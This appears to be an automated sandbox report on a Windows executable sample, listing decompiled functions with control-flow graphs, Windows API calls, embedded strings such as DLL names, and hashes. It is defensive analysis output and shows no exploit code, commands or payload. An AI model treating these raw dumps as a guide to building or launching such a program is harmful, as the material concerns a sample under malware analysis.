                                                                                control_flow_graph 0 7ff65593dfd0-7ff65593e024 call 7ff655952450 GetModuleHandleW 3 7ff65593e026-7ff65593e039 GetProcAddress 0->3 4 7ff65593e07b-7ff65593e3a5 0->4 7 7ff65593e03b-7ff65593e04a 3->7 8 7ff65593e053-7ff65593e066 GetProcAddress 3->8 5 7ff65593e3ab-7ff65593e3b4 call 7ff65595b788 4->5 6 7ff65593e503-7ff65593e521 call 7ff655936454 call 7ff655937df4 4->6 5->6 16 7ff65593e3ba-7ff65593e3fd call 7ff655936454 CreateFileW 5->16 19 7ff65593e525-7ff65593e52f call 7ff6559351a4 6->19 7->8 8->4 9 7ff65593e068-7ff65593e078 8->9 9->4 22 7ff65593e4f0-7ff65593e4fe CloseHandle call 7ff655921fa0 16->22 23 7ff65593e403-7ff65593e416 SetFilePointer 16->23 27 7ff65593e531-7ff65593e53c call 7ff65593dd88 19->27 28 7ff65593e564-7ff65593e5ac call 7ff65595797c call 7ff65592129c call 7ff655938090 call 7ff655921fa0 call 7ff6559332bc 19->28 22->6 23->22 25 7ff65593e41c-7ff65593e43e ReadFile 23->25 25->22 29 7ff65593e444-7ff65593e452 25->29 27->28 40 7ff65593e53e-7ff65593e562 CompareStringW 27->40 66 7ff65593e5b1-7ff65593e5b4 28->66 32 7ff65593e458-7ff65593e4ac call 7ff65595797c call 7ff65592129c 29->32 33 7ff65593e800-7ff65593e807 call 7ff655952624 29->33 49 7ff65593e4c3-7ff65593e4d9 call 7ff65593d0a0 32->49 40->28 43 7ff65593e5bd-7ff65593e5c6 40->43 43->19 46 7ff65593e5cc 43->46 50 7ff65593e5d1-7ff65593e5d4 46->50 61 7ff65593e4db-7ff65593e4eb call 7ff655921fa0 * 2 49->61 62 7ff65593e4ae-7ff65593e4be call 7ff65593dd88 49->62 53 7ff65593e5d6-7ff65593e5d9 50->53 54 7ff65593e63f-7ff65593e642 50->54 59 7ff65593e5dd-7ff65593e62d call 7ff65595797c call 7ff65592129c call 7ff655938090 call 7ff655921fa0 call 7ff6559332bc 53->59 57 7ff65593e648-7ff65593e65b call 7ff655937eb0 call 7ff6559351a4 54->57 58 7ff65593e7c2-7ff65593e7ff call 7ff655921fa0 * 2 call 7ff655952320 54->58 84 7ff65593e706-7ff65593e753 call 7ff65593da98 AllocConsole 57->84 85 7ff65593e661-7ff65593e701 call 7ff65593dd88 * 2 call 7ff65593aae0 call 7ff65593da98 call 7ff65593aae0 call 7ff65593dc2c call 7ff6559487ac call 7ff6559219e0 57->85 106 7ff65593e63c 59->106 107 7ff65593e62f-7ff65593e638 59->107 61->22 62->49 72 7ff65593e5b6 66->72 73 7ff65593e5ce 66->73 72->43 73->50 95 7ff65593e7b0 84->95 96 7ff65593e755-7ff65593e7aa GetCurrentProcessId AttachConsole call 7ff65593e868 call 7ff65593e858 GetStdHandle WriteConsoleW Sleep FreeConsole 84->96 100 7ff65593e7b4-7ff65593e7bb call 7ff6559219e0 ExitProcess 85->100 95->100 96->95 106->54 107->59 111 7ff65593e63a 107->111 111->54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                • API String ID: 1496594111-2013832382
                                                                                • Opcode ID: 98412f925c25e5251e7433e2f7fa53b3e9c32244f994fcc6063bd743035dabb3
                                                                                • Instruction ID: 1639b877df5efc8b725d87078639cb850880f03c011f1f00d36006ee65c9ee6b
                                                                                • Opcode Fuzzy Hash: 98412f925c25e5251e7433e2f7fa53b3e9c32244f994fcc6063bd743035dabb3
                                                                                • Instruction Fuzzy Hash: E2324039A09BC295EB119F60E8481E933A4FF44B5CF581136DA4DA7766EF3CDA58C380
                                                                                Function 00007FF6559398DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655938E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF655938F8D
                                                                                • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF655939F75
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65593A42F
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65593A435
                                                                                  • Part of subcall function 00007FF655940BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF655940B44), ref: 00007FF655940BE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                • API String ID: 3629253777-3268106645
                                                                                • Opcode ID: 73d56d0c11a86a55a1dc3675c73e4a0fd07f95c757df1f2c588dae54c11dd42d
                                                                                • Instruction ID: be199191a1df914d0a1507efe340d0be7b00d10b31bbe76980509de2ab35ff31
                                                                                • Opcode Fuzzy Hash: 73d56d0c11a86a55a1dc3675c73e4a0fd07f95c757df1f2c588dae54c11dd42d
                                                                                • Instruction Fuzzy Hash: E662B02AA196C2C6EB10DF64D44C2BD63A5FB40B8CF894131DA5DA7A96EF3CED44C341
                                                                                Function 00007FF655951900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1907 7ff655951900-7ff655951989 call 7ff655951558 1910 7ff65595198b-7ff6559519af call 7ff655951868 RaiseException 1907->1910 1911 7ff6559519b4-7ff6559519d1 1907->1911 1917 7ff655951bb8-7ff655951bd5 1910->1917 1912 7ff6559519e6-7ff6559519ea 1911->1912 1913 7ff6559519d3-7ff6559519e4 1911->1913 1915 7ff6559519ed-7ff6559519f9 1912->1915 1913->1915 1918 7ff655951a1a-7ff655951a1d 1915->1918 1919 7ff6559519fb-7ff655951a0d 1915->1919 1920 7ff655951a23-7ff655951a26 1918->1920 1921 7ff655951ac4-7ff655951acb 1918->1921 1927 7ff655951b89-7ff655951b93 1919->1927 1928 7ff655951a13 1919->1928 1925 7ff655951a3d-7ff655951a52 LoadLibraryExA 1920->1925 1926 7ff655951a28-7ff655951a3b 1920->1926 1923 7ff655951acd-7ff655951adc 1921->1923 1924 7ff655951adf-7ff655951ae2 1921->1924 1923->1924 1929 7ff655951ae8-7ff655951aec 1924->1929 1930 7ff655951b85 1924->1930 1931 7ff655951aa9-7ff655951ab2 1925->1931 1932 7ff655951a54-7ff655951a67 GetLastError 1925->1932 1926->1925 1926->1931 1939 7ff655951b95-7ff655951ba6 1927->1939 1940 7ff655951bb0 call 7ff655951868 1927->1940 1928->1918 1937 7ff655951b1b-7ff655951b2e GetProcAddress 1929->1937 1938 7ff655951aee-7ff655951af2 1929->1938 1930->1927 1933 7ff655951abd 1931->1933 1934 7ff655951ab4-7ff655951ab7 FreeLibrary 1931->1934 1941 7ff655951a69-7ff655951a7c 1932->1941 1942 7ff655951a7e-7ff655951aa4 call 7ff655951868 RaiseException 1932->1942 1933->1921 1934->1933 1937->1930 1945 7ff655951b30-7ff655951b43 GetLastError 1937->1945 1938->1937 1946 7ff655951af4-7ff655951aff 1938->1946 1939->1940 1949 7ff655951bb5 1940->1949 1941->1931 1941->1942 1942->1917 1951 7ff655951b5a-7ff655951b81 call 7ff655951868 RaiseException call 7ff655951558 1945->1951 1952 7ff655951b45-7ff655951b58 1945->1952 1946->1937 1947 7ff655951b01-7ff655951b08 1946->1947 1947->1937 1953 7ff655951b0a-7ff655951b0f 1947->1953 1949->1917 1951->1930 1952->1930 1952->1951 1953->1937 1955 7ff655951b11-7ff655951b19 1953->1955 1955->1930 1955->1937
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                • String ID: H
                                                                                • API String ID: 3432403771-2852464175
                                                                                • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction ID: 3eefbbfa8ec3b6520450c0c99b96087d21b042db8ad6deff58492e69e8342766
                                                                                • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction Fuzzy Hash: BD91693AA05B928AEB10CF65D8486A833B5FF08B99F094435DE4D6774AEF3CE855C340
                                                                                Function 00007FF65594F4E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1960 7ff65594f4e0-7ff65594f523 1961 7ff65594f529-7ff65594f565 call 7ff655953cf0 1960->1961 1962 7ff65594f894-7ff65594f8b9 call 7ff655921fa0 call 7ff655952320 1960->1962 1968 7ff65594f56a-7ff65594f571 1961->1968 1969 7ff65594f567 1961->1969 1970 7ff65594f582-7ff65594f586 1968->1970 1971 7ff65594f573-7ff65594f577 1968->1971 1969->1968 1975 7ff65594f58b-7ff65594f596 1970->1975 1976 7ff65594f588 1970->1976 1973 7ff65594f57c-7ff65594f580 1971->1973 1974 7ff65594f579 1971->1974 1973->1975 1974->1973 1977 7ff65594f59c 1975->1977 1978 7ff65594f628 1975->1978 1976->1975 1979 7ff65594f5a2-7ff65594f5a9 1977->1979 1980 7ff65594f62c-7ff65594f62f 1978->1980 1981 7ff65594f5ab 1979->1981 1982 7ff65594f5ae-7ff65594f5b3 1979->1982 1983 7ff65594f637-7ff65594f63a 1980->1983 1984 7ff65594f631-7ff65594f635 1980->1984 1981->1982 1985 7ff65594f5e5-7ff65594f5f0 1982->1985 1986 7ff65594f5b5 1982->1986 1987 7ff65594f660-7ff65594f673 call 7ff6559363ac 1983->1987 1988 7ff65594f63c-7ff65594f643 1983->1988 1984->1983 1984->1987 1990 7ff65594f5f2 1985->1990 1991 7ff65594f5f5-7ff65594f5fa 1985->1991 1992 7ff65594f5ca-7ff65594f5d0 1986->1992 1999 7ff65594f698-7ff65594f6ed call 7ff65595797c call 7ff65592129c call 7ff6559332a8 call 7ff655921fa0 1987->1999 2000 7ff65594f675-7ff65594f693 call 7ff6559413c4 1987->2000 1988->1987 1993 7ff65594f645-7ff65594f65c 1988->1993 1990->1991 1995 7ff65594f8ba-7ff65594f8c1 1991->1995 1996 7ff65594f600-7ff65594f607 1991->1996 1997 7ff65594f5b7-7ff65594f5be 1992->1997 1998 7ff65594f5d2 1992->1998 1993->1987 2003 7ff65594f8c6-7ff65594f8cb 1995->2003 2004 7ff65594f8c3 1995->2004 2001 7ff65594f60c-7ff65594f612 1996->2001 2002 7ff65594f609 1996->2002 2005 7ff65594f5c3-7ff65594f5c8 1997->2005 2006 7ff65594f5c0 1997->2006 1998->1985 2027 7ff65594f742-7ff65594f74f ShellExecuteExW 1999->2027 2028 7ff65594f6ef-7ff65594f73d call 7ff65595797c call 7ff65592129c call 7ff655935b60 call 7ff655921fa0 1999->2028 2000->1999 2001->1995 2009 7ff65594f618-7ff65594f622 2001->2009 2002->2001 2010 7ff65594f8cd-7ff65594f8d4 2003->2010 2011 7ff65594f8de-7ff65594f8e6 2003->2011 2004->2003 2005->1992 2012 7ff65594f5d4-7ff65594f5db 2005->2012 2006->2005 2009->1978 2009->1979 2019 7ff65594f8d6 2010->2019 2020 7ff65594f8d9 2010->2020 2013 7ff65594f8eb-7ff65594f8f6 2011->2013 2014 7ff65594f8e8 2011->2014 2015 7ff65594f5dd 2012->2015 2016 7ff65594f5e0 2012->2016 2013->1980 2014->2013 2015->2016 2016->1985 2019->2020 2020->2011 2030 7ff65594f846-7ff65594f84e 2027->2030 2031 7ff65594f755-7ff65594f75f 2027->2031 2028->2027 2032 7ff65594f882-7ff65594f88f 2030->2032 2033 7ff65594f850-7ff65594f866 2030->2033 2035 7ff65594f76f-7ff65594f772 2031->2035 2036 7ff65594f761-7ff65594f764 2031->2036 2032->1962 2037 7ff65594f87d call 7ff65595220c 2033->2037 2038 7ff65594f868-7ff65594f87b 2033->2038 2041 7ff65594f774-7ff65594f77f IsWindowVisible 2035->2041 2042 7ff65594f78e-7ff65594f7a1 WaitForInputIdle call 7ff65594fe24 2035->2042 2036->2035 2040 7ff65594f766-7ff65594f76d 2036->2040 2037->2032 2038->2037 2044 7ff65594f8fb-7ff65594f903 call 7ff655957904 2038->2044 2040->2035 2047 7ff65594f7e3-7ff65594f7f0 CloseHandle 2040->2047 2041->2042 2048 7ff65594f781-7ff65594f78c ShowWindow 2041->2048 2049 7ff65594f7a6-7ff65594f7ad 2042->2049 2052 7ff65594f7f2-7ff65594f803 call 7ff6559413c4 2047->2052 2053 7ff65594f805-7ff65594f80c 2047->2053 2048->2042 2049->2047 2054 7ff65594f7af-7ff65594f7b2 2049->2054 2052->2053 2058 7ff65594f82e-7ff65594f830 2052->2058 2053->2058 2059 7ff65594f80e-7ff65594f811 2053->2059 2054->2047 2060 7ff65594f7b4-7ff65594f7c5 GetExitCodeProcess 2054->2060 2058->2030 2064 7ff65594f832-7ff65594f835 2058->2064 2059->2058 2063 7ff65594f813-7ff65594f828 2059->2063 2060->2047 2065 7ff65594f7c7-7ff65594f7dc 2060->2065 2063->2058 2064->2030 2067 7ff65594f837-7ff65594f845 ShowWindow 2064->2067 2065->2047 2067->2030
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                • String ID: .exe$.inf$Install$p
                                                                                • API String ID: 148627002-3607691742
                                                                                • Opcode ID: a9537e312442e646dd9c9462cba9269d27ba10dbd49a782409ce5fb443879e24
                                                                                • Instruction ID: d2441a335ce06a1475988314056b26a3834a03500f4dce0b0dd5763dfab05fd4
                                                                                • Opcode Fuzzy Hash: a9537e312442e646dd9c9462cba9269d27ba10dbd49a782409ce5fb443879e24
                                                                                • Instruction Fuzzy Hash: BDC1706AF18682D5FB10CB25D95827923A1FF85F88F084035DA9DA77A6DF3CEC958300
                                                                                Function 00007FF65594F0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                • String ID:
                                                                                • API String ID: 4119318379-0
                                                                                • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                • Instruction ID: f84913a357688a68e2c9d0d1995984ab345946b6a9cf62c872855684edccc12b
                                                                                • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                • Instruction Fuzzy Hash: DB41C339B1478286F7108F61E818BAA2360FB89F9CF480139DD1A67B9ACF3DDC458744
                                                                                Function 00007FF65592EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                • Instruction ID: 257ca17fec3e84e742434bf00ede5fdf3ebed8230426c0d2881613d67e690119
                                                                                • Opcode Fuzzy Hash: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                • Instruction Fuzzy Hash: C812B36AF08B8184EB10CB65D8492BD6361EB45B9CF440235DA5CA7ADBDF3CD989C340
                                                                                Function 00007FF6559324C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3522 7ff6559324c0-7ff6559324fb 3523 7ff655932506 3522->3523 3524 7ff6559324fd-7ff655932504 3522->3524 3525 7ff655932509-7ff655932578 3523->3525 3524->3523 3524->3525 3526 7ff65593257d-7ff6559325a8 CreateFileW 3525->3526 3527 7ff65593257a 3525->3527 3528 7ff655932688-7ff65593268d 3526->3528 3529 7ff6559325ae-7ff6559325de GetLastError call 7ff655936a0c 3526->3529 3527->3526 3530 7ff655932693-7ff655932697 3528->3530 3538 7ff65593262c 3529->3538 3539 7ff6559325e0-7ff65593262a CreateFileW GetLastError 3529->3539 3532 7ff655932699-7ff65593269c 3530->3532 3533 7ff6559326a5-7ff6559326a9 3530->3533 3532->3533 3535 7ff65593269e 3532->3535 3536 7ff6559326ab-7ff6559326af 3533->3536 3537 7ff6559326cf-7ff6559326e3 3533->3537 3535->3533 3536->3537 3540 7ff6559326b1-7ff6559326c9 SetFileTime 3536->3540 3541 7ff65593270c-7ff655932735 call 7ff655952320 3537->3541 3542 7ff6559326e5-7ff6559326f0 3537->3542 3543 7ff655932632-7ff65593263a 3538->3543 3539->3543 3540->3537 3544 7ff655932708 3542->3544 3545 7ff6559326f2-7ff6559326fa 3542->3545 3546 7ff65593263c-7ff655932653 3543->3546 3547 7ff655932673-7ff655932686 3543->3547 3544->3541 3549 7ff6559326fc 3545->3549 3550 7ff6559326ff-7ff655932703 call 7ff6559220b0 3545->3550 3551 7ff65593266e call 7ff65595220c 3546->3551 3552 7ff655932655-7ff655932668 3546->3552 3547->3530 3549->3550 3550->3544 3551->3547 3552->3551 3555 7ff655932736-7ff65593273b call 7ff655957904 3552->3555
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3536497005-0
                                                                                • Opcode ID: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                • Instruction ID: ac0281bbecca6cd03563e1d27caebfeba21feeb66a1736a925a8d77c6f5fa6d4
                                                                                • Opcode Fuzzy Hash: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                • Instruction Fuzzy Hash: 63611A6AA1878185EB208B69E40836EA7B1FB84BACF140335CF6D53AD5CF3DD858C740
                                                                                Function 00007FF65594B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                • String ID: ]
                                                                                • API String ID: 2347093688-3352871620
                                                                                • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction ID: e5e656c6ddb9065eb70b0d4c22f99c026ed1285c07e58ca7a7066fc534cc252b
                                                                                • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                • Instruction Fuzzy Hash: D2115429B0D6C282EE649B21965C2795392BF89FC9F0C0434D9AD97B9BDF2DEC048601
                                                                                Function 00007FF65594FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                • String ID:
                                                                                • API String ID: 3621893840-0
